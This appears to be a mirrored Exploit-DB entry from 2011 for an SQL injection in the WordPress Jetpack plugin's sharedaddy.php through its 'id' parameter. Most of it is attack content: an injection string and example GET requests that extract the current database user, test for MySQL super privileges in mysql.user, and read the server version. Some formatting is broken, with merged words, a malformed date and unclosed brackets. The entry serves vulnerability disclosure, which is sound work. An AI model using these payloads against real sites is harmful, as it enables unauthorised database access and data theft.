WordPress Plugin jetpack – ‘sharedaddy.php’ ID SQL Injection

  • 作者: longrifle0x
    日期: 2011-11-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18126/
  • ######################################################
    # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
    # Date: 2011-19-11
    # Author: longrifle0x
    # software: WordPress
    # Download:http://wordpress.org/extend/plugins/jetpack/
    # Tools: SQLMAP
    ######################################################
    
    *DESCRIPTION
    Discovered a vulnerability injetpack, WordPress Plugin,
    vulnerability is SQL injection.
    
    File:wp-content/plugins/jetpack/modules/sharedaddy.php
    Exploit: id=-1; or 1=if
    
    *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
    [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
    [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
    http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
    [GET][id=-1][MID((VERSION()),1,6)